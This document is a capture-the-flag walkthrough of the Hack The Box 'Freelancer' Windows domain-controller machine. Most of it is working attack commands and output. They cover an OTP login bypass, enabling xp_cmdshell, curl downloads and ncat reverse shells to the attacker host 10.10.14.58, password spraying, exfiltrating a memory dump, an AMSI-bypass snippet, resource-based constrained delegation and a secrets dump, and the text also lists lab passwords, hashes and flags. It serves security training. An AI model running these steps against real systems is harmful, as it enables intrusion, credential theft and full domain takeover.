HTB - Freelancer [Hard]
TCP Scan
> TARGET=10.129.69.99 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
|_http-server-header: nginx/1.25.5
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-06-02 03:28:45Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51703/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51707/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
|_ Message signing enabled and required
- add host
echo '10.129.69.99 freelancer.htb' >> /etc/hosts
enum
> enum4linux freelancer.htb
Domain Name: FREELANCER
Domain Sid: S-1-5-21-3542429192-2036945976-3483670807
userenum
- sign up as an employer, using a complex password. Note: After creating your employer account, your account will be inactive until our team reviews your account details and contacts you by email to activate your account.
- recover the account at http://freelancer.htb/accounts/recovery/
- then login to access the account
- an admin account can be found at: http://freelancer.htb/accounts/profile/visit/2/
- qrcode: http://freelancer.htb/accounts/login/otp/MTAwMTE=/1f593250adac916c090bc7e5db6e8c09/
- use an admin id (i.e. 2) and substitute it into the above QR code URL
http://freelancer.htb/accounts/login/otp/Mgo=/65018e8fbb17e2fd5bd0d0982c8f92b7/
- now, you are logged in as admin
johnHalond@freelancer.htb
foothold
- go to /admin and execute the SQL command
SELECT * FROM INFORMATION_SCHEMA.TABLES;
pbkdf2_sha256$600000$IgjtPcBB9VySMPXoeAc8PL$pmpMU81uwwKvdxUBNVk/K4Wwh4pw/fWIseSx4XkyMJo= admin
pbkdf2_sha256$600000$tip7FkNIoN7nKNTLckQuiY$Q6g1Qx0B8ul/qxGQ0hX4lYoHc3jxkrWaf3lZvNknfWU= Camellia19970
pbkdf2_sha256$600000$x9n1jiojmHAAzp3RSfvh3A$UmFMGDpFb6Gjz1XHmqNoO2eH7+7kYFfrDahLkJGpoUo= crista.W
pbkdf2_sha256$600000$R9zyIpTUoHWkY3OK9mDf80$Qzm3CzI3RN6sJ3c8Ntuif9hqjZCIe+J9DxQGgPgVc3I= ItachiUchiha
pbkdf2_sha256$600000$4KqR8oqlwUMVVjZuzbz4Wu$2mdmIWr5SyIdLBngGve3pZyS1KaOO4+hlXgmxAeGtVs= JohntheCarter
pbkdf2_sha256$600000$jP0nxcmm3rWlUWkf1xBqhE$mnABoJ2VkzyUi1LC+IuwjJZOs4/z6yqQG4tpJy1b86A= Jonathon.R
pbkdf2_sha256$600000$n807xz2S84KMIXaCE1d8cd$HS+8AffbYcIHSXTE7LoYtTiJRAmAqrkq7o+RAqZDPys= lisa.Ar
pbkdf2_sha256$600000$sLNgktJGLeN8BE9mzu7ZaH$dDbEJQWTdNGhw0xfJKzBvAhg+6Ag76WaXeFgjUKE89U= Markos
pbkdf2_sha256$600000$BYsJKIsg3DqI3DxZ08AL5t$4NYhZbnmJY7qQOsZADGbdDZk5EyS7NBv0NVA21LKLs0= martin1234
pbkdf2_sha256$600000$Vv05zVNTevRy9j29n3nnmC$WIrntfpqMYGv7x79UZtOXOLOmnskyHItdxKMzh0BPRY= maya001
pbkdf2_sha256$600000$ItLrs0zNKnvHpa8x81YUET$znvkVByIaU8U+s41mE6RjOd9yrpe1DLBF/l76bMznwo= Philippos
pbkdf2_sha256$600000$eyWcuxHnbIoONyvdQ3tZaM$TN4+gH91PqmpGSKpDZiivK1TqGbNfXErBEa558isebo= SaraArkhader
pbkdf2_sha256$600000$ok26XbM8us6jrG4BvlsM6h$IZbj6fZzUIagbziFSpPP68olFK7yrUCFTAZmK7qo7co= test
pbkdf2_sha256$600000$LCdispX2eABGjp4wQpAkZt$UqGIDDNd9Mnkoa8xMw3DTvW9x50JSV94OALXBNNtisw= test1
pbkdf2_sha256$600000$6z0gkQxAgg6ttMJUL1MKLE$iDl9amRUgVNXxVAsUaPhjVKvqgS6i5EETFeFZKlr3e0= tomHazard
- upgrade user to sysadmin
EXECUTE AS LOGIN = 'SA';
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin';
sp_configure 'Show Advanced Options', 1
RECONFIGURE
sp_configure 'xp_cmdshell', 1
RECONFIGURE
- reverse shell
EXEC master..xp_cmdshell 'curl -s http://10.10.14.58/ncat.exe -o c:\Users\sql_svc\Desktop\ncat.exe'
EXEC master..xp_cmdshell 'curl -s http://10.10.14.58/libssl-3.dll -o c:\Users\sql_svc\Desktop\libssl-3.dll'
EXEC master..xp_cmdshell 'curl -s http://10.10.14.58/libcrypto-3.dll -o c:\Users\sql_svc\Desktop\libcrypto-3.dll'
EXEC xp_cmdshell 'c:\Users\sql_svc\Desktop\ncat.exe 10.10.14.58 4444 -e cmd.exe'
user: mikasaAckerman
- found password in
c:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU>type sql-Configuration.INI
type sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
- compose user and password lists
# users.txt
Administrator
alex.hill
carol.poland
d.jones
dthomas
ereed
Ethan.l
evelyn.adams
Guest
hking
jen.brown
jgreen
jmartinez
krbtgt
leon.sk
lkazanof
lorra199
maya.artmes
michael.williams
mikasaAckerman
olivia.garcia
samuel.turner
sdavis
sophia.h
sql_svc
SQLBackupOperator
sshd
taylor
wwalker
# passwords.txt
IL0v3ErenY3ager
t3mp0r@ryS@PWD
- password spray
> crackmapexec smb freelancer.htb -u users.txt -p passwords.txt
SMB freelancer.htb 445 DC [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager
mikasaAckerman:IL0v3ErenY3ager
- https://github.com/antonioCoco/RunasCs
.\RunasCs.exe mikasaAckerman IL0v3ErenY3ager cmd.exe -r 10.10.14.58:443
c:\Users\mikasaAckerman\Desktop>type user.txt
type user.txt
9971bcc8b11abfa6b6bb14e3fe00c1a3
user: lorra199
c:\Users\mikasaAckerman\Desktop>type mail.txt
Hello Mikasa,
I tried once again to work with Liza Kazanoff after seeking her help to troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the problem started occurring after we installed the new update of SQL Server 2019.
I attempted the solutions you provided in your last email, but unfortunately, there was no improvement. Whenever we try to establish a remote SQL connection to the installed instance, the server's CPU starts overheating, and the RAM usage keeps increasing until the BSOD appears, forcing the server to restart.
Nevertheless, Liza has requested me to generate a full memory dump on the Datacenter and send it to you for further assistance in troubleshooting the issue.
Best regards,
- re-upload ncat
curl http://10.10.14.58/ncat.exe -o c:\temp\ncat.exe
curl http://10.10.14.58/libssl-3.dll -o c:\temp\libssl-3.dll
curl http://10.10.14.58/libcrypto-3.dll -o c:\temp\libcrypto-3.dll
- download the MEMORY.7z file
c:\temp\ncat.exe 10.10.14.58 6666 < MEMORY.7z
- unzip to get a dump file, then extract the hives using https://github.com/ufrisk/MemProcFS
- running it can corrupt your file system, so use a separate VM
https://github.com/ufrisk/MemProcFS
This may be useful; then try to bypass AMSI and dump something.
Grab the 3 hives and dump the passwords
impacket-secretsdump -sam SAM.reghive -system SYSTEM.reghive -security SECURITY.reghive local
The entry labelled "Unknown User" is the password for lorra199. You can use RunasCs again or evil-winrm.
I'm currently stuck doing the dcsync.
I have created a new machine account with msds-allowedtoactonbehalfofotheridentity and can create a ccache ticket with getST.
But secretsdump keeps failing with STATUS_MORE_PROCESSING_REQUIRED.
Not sure if I'm doing something wrong or something is broken. I also keep having to sync clocks because of skew.
Any hints?
I have used this tool that somebody linked earlier:
https://github.com/ufrisk/MemProcFS
Then grabbed the ...MACHINE_SYSTEM.reghive etc. from registry\hive_files
- login as lorra199
evil-winrm -i freelancer.htb -u lorra199 -p PWN3D#l0rr@Armessa199
user: liza.kazanof
- list deleted objects
Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
memberOf: {CN=Remote Management Users,CN=Builtin,DC=freelancer,DC=htb, CN=Backup Operators,CN=Builtin,DC=freelancer,DC=htb}
- restore liza.kazanof, who is a member of the Backup Operators group
# get the guid of existing user
Get-ADObject -filter ' name -eq "Liza Kazanof"' -property *
# remove the existing user
remove-adobject -identity 501442ec-1e03-4451-949b-4770f98b7f52
# restore the deleted user
Restore-ADObject -identity ebe15df5-e265-45ec-b7fc-359877217138 -NewName liza.kazanof
# upload ncat
*Evil-WinRM* PS C:\temp> curl http://10.10.14.58/ncat.exe -o C:\temp\ncat.exe
*Evil-WinRM* PS C:\temp> curl http://10.10.14.58/libssl-3.dll -o C:\temp\libssl-3.dll
*Evil-WinRM* PS C:\temp> curl http://10.10.14.58/libcrypto-3.dll -o C:\temp\libcrypto-3.dll
$SecPassword = ConvertTo-SecureString 'RockYou!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('liza.kazanof', $SecPassword)
$session = New-PSSession -Credential $Cred
Invoke-Command -Session $session -scriptblock { c:\temp\ncat.exe 10.10.14.58 5555 -e powershell.exe }
root
$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)
- setup powerview and powermad
- https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
- https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
curl http://10.10.14.58/PowerView.ps1 -o PowerView.ps1
curl http://10.10.14.58/PowerMad.ps1 -o PowerMad.ps1
Import-Module .\PowerView.ps1
Import-Module .\PowerMad.ps1
- create a new attacker-controlled machine account
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
- get a ticket (getST: service ticket for cifs/dc.freelancer.htb, impersonating Administrator)
rdate -n freelancer.htb && impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate 'Administrator' 'freelancer/attackersystem$:Summer2018!' -dc-ip dc.freelancer.htb
- dump secrets
rdate -n freelancer.htb && KRB5CCNAME=Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache impacket-secretsdump freelancer/administrator@dc.freelancer.htb -k -no-pass
- login and get flag
evil-winrm -i dc.freelancer.htb -u administrator -H 0039318f1e8274633445bce32ad1a290
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> ls
Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/3/2024 7:30 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
b69fbe378351f45e2414380b31d5c6e5